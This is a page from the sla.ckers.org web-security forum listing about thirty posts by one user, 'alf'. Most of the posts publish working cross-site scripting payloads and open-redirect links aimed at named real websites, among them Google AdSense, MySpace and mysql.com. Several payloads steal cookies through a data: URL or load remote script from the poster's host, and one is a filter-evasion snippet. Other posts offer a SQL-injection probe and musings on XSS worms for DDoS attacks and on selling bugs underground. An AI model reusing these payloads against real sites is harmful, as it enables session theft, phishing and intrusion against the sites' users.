Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 39
7 years ago
alf
haha, now lets go and play ! ;-) Would be a nice PoC if 10 of us could ban a couple of thousand users from their homepage.
Forum: Full Disclosure
7 years ago
alf
It seems you're making good $$$ with all this traffic, so now everybody get up and tell them your exploits! Don't be cowards!
Forum: Full Disclosure
7 years ago
alf
hehe of course google lurks around here.. I dont like them any more.
Forum: XSS Info
7 years ago
alf
"AOL scene" hehe thats the right term ;)
Forum: Full Disclosure
7 years ago
alf
perhaps a bit offtopic: did you ever think about DDos Attacks caused by e.g. some kind of "Social" site or community which has some XSS issues. Now build a small XSS worm which autospreads and let the affected users abuse SQLinjection flaws (huge queries, ' OR '1'='1). Have seen this in the wild.
Forum: CSRF and Session Info
7 years ago
alf
... they just want some geeks to audit their homepage in order not having to spend any money on websecurity. You are able to sell these issues for large $$$ in the underground, but if you send them directly to Microsoft they will fix it and some low-ranking worker will say "thank you" for your work. Great.
Forum: Full Disclosure
7 years ago
alf
tx Wrote: ------------------------------------------------------- > http://animaldiversity.ummz.umich.edu/local/redire > ct.php/http://www.google.com > http://rd.business.com/index.asp?bdcu=http://www.g > oogle.com > http://www.ktuh.org/redirect.php?http://www.google > .com. > http://www.fasterskier.com/events/results.php?http > ://www.google.com > http://ozrep
Forum: Full Disclosure
7 years ago
alf
yes I'm good ;-) google XSS flaw by me ( http://www.mybeNi.tk ) https://www.google.com/accounts/ServiceLogin?service=adsense&hl=de&ifr=true&passive=true&rm=hide&afpui=3&nui=15&alwf=true&continue=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&followup=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&ltmpl=%22%3E%3Cscript%3Edocument.body.innerHTML%3D
Forum: Full Disclosure
7 years ago
alf
btw I had xss in my useragent for some time aswell, and suddenly i was banned from all the governmental homepages... I removed the Useragent and set it to default and it worked again ;-) So I think my javascript alert has scared a sysop like hell :P (while reading the logs in his cms)
Forum: Search Engine Hacking and SEO
7 years ago
alf
rsnake Wrote: ------------------------------------------------------- > Until something bad happens most companies don't > jump on XSS I've found. Most of the larger > companies jump on it simply because it's bad to > have anyone lose trust in your site - and that is > caused when the media picks up the stories. hah lol i dont believe this. why didnt ebay youtube amazon
Forum: Full Disclosure
7 years ago
alf
11. blah
asap!
Forum: Privacy
7 years ago
alf
12. blah
cheers
Forum: Privacy
7 years ago
alf
now make someone klick on "here" and phish myspace cookies... http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=data:text/html,%3Cbody%20onLoad=document.write(document.cookie)%3E%3C/body%3E
Forum: Full Disclosure
7 years ago
alf
http://www.myspace.com/antiphishing have a look at it, if somebody wants to play with it, pm me. For you lazy folks: In the Textbox there's the CSS code to move your div over myspace's "main content" . Any other ideas for funny domains? cheers alf.
Forum: Full Disclosure
7 years ago
alf
Thank you for contacting MySQL AB, We have fixed this, thanks again for pointing it out to us. Hope this helps, MySQL Web Team --------------------------------------------------------------------- nah, 2 sentences, I hoped for more :( cheers alf
Forum: Full Disclosure
7 years ago
alf
hm i mean i'm no database guru, but if my "logical stuff" is executed, i could find out the table_name and DROP the table, if you find out the users table then you'll probably be able to get passwords (hashes). but thats quite much work i think cheers
Forum: Full Disclosure
7 years ago
alf
some xss out of my golden box... yeh, my penis is very long ;-) http://joblo.com/tellafriend.php?id=14018'%22%3E%3Cscript%20src=http://mybeNi.rootzilla.de/mybeNi/xw.js%3E%3C/script%3E wah i got loads of beautiful xss but i dont really wanna disclose em :(
Forum: Full Disclosure
7 years ago
alf
http://mysql.com/customers/customer.php?id=38%20AND%201=1 imho very funny ;-) webmaster got informed, fulldisc-list will be noticed asap after webmaster replied cheers alf
Forum: Full Disclosure
7 years ago
alf
okay here my version without + - and quotes (i saw some servers filtered the + and - operators, kinda crazy) x=document.createElement(String.fromCharCode(115,99,114,105,112,116));x.src=String.fromCharCode(1,2,3,4);document.body.appendChild(x); now we need a way to execute JS without the script tags ;)
Forum: XSS Info
7 years ago
alf
OT: I posted one for turkisdailynews some posts above but nevertheless nice find =)
Forum: Full Disclosure
7 years ago
alf
yeh i know, i appreciate for the placement in the wrong board and thanks for your solution maluc! <3 cheers alf
Forum: XSS Info
7 years ago
alf
I just was playing around with my XSS list and automated it a bit, then i saw s.th. strange: http://www.wintotal.de/Suche/index.php?suchtext='%22%3E%3Cscript%20src=%22asd://bla.com/xw.js%22%3E%3C/script%3E obviously this is XSS, but if you insert http://www.wintotal.de/Suche/index.php?suchtext='%22%3E%3Cscript%20src=%22http://my.xss.file.js%22%3E%3C/script%3E theres a fine /* 40
Forum: XSS Info
7 years ago
alf
rsnake Wrote: ------------------------------------------------------- > Unfortunately I stumbled upon an SQL injection > issue once (the quotes I guess) and it actually > brought the server down (oops!). After that I > stayed clear of injecting XSS via user agents. LMAO, the same thing happend to me @ the beginning of this year, the page of a big airport, lil' alfie found the
Forum: Search Engine Hacking and SEO
7 years ago
alf
With me its the same as maluc + jungsonn... Just Yesterday i phoned a "WebDesign" - Company having - not kidding - XSS flaws within every single Page they coded (php ^.^). They told me they'd fix it, and i also sent them an email including the xss links, some have been fixed, the majority is still open _and_ they didnt even say ty :( I mean in the future i probably won't point out the f
Forum: Full Disclosure
7 years ago
alf
mesca Wrote: ------------------------------------------------------- > alf, > > > http://www.MAN.de > > Funny, I was auditing a Typo3 website last month > for a big company and found a lot of issues around > this tt_news module. > > Hint: there is also some problems with Typo3 core > and some other modules. I signed a non-disclosure > agreement s
Forum: Full Disclosure
7 years ago
alf
http://www.gmx.net/dereferer.do?dest=http%3A%2F%2Fwww.mybeNi.tk http://toi.passul.t-online.de/cgi-bin/XP/toi/pers/dsl/mehr01,toi/pers/ziel,0,2,1?l=http://www.mybeNi.tk http://www.arcor.de/home/extern_track.php?url=http://www.mybeNi.tk&name=click-shopping&kat=nav http://www.rtl.de/tools/count/xdot/count.php?id=12&artikelid=12&dst=http://www.mybeNi.tk http://cre.chunnel.de/bounce
Forum: Full Disclosure
7 years ago
alf
http://de.ard.yahoo.com/SIG=12lnn77nh/M=200084491.201287525.202593797.200702075/D=finfr/S=97107386:FB2/Y=FR/EXP=1163448820/A=200544671/R=0/SIG=113es77l7/*http://www.mybeNi.tk dunno if this was here before
Forum: Full Disclosure
7 years ago
alf
some fresh ones for the relaunch of my homepage: http://www.wintotal.de/User/LogInOut.php?URL='%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://leaguez.yusho.de/?module=news'%22%3Cscript%3Ealert(123)%3C/script%3E http://www.MAN.de/index.php?id=520&tx_ttnews=1585&tx_ttnews=262'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.genomics.sinica.edu.tw/index.php?t=13'%22%3E%3Cscri
Forum: Full Disclosure
7 years ago
alf
http://adclient.uimserv.net/event.ng/Type=click&Redirect=http://www.n0n4m3-cr3w.de/Subdomain_Service/alf/index.php?ct=apps
Forum: Full Disclosure
7 years ago
alf
http://www.turkishdailynews.com.tr/article.php?enewsid=58929%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2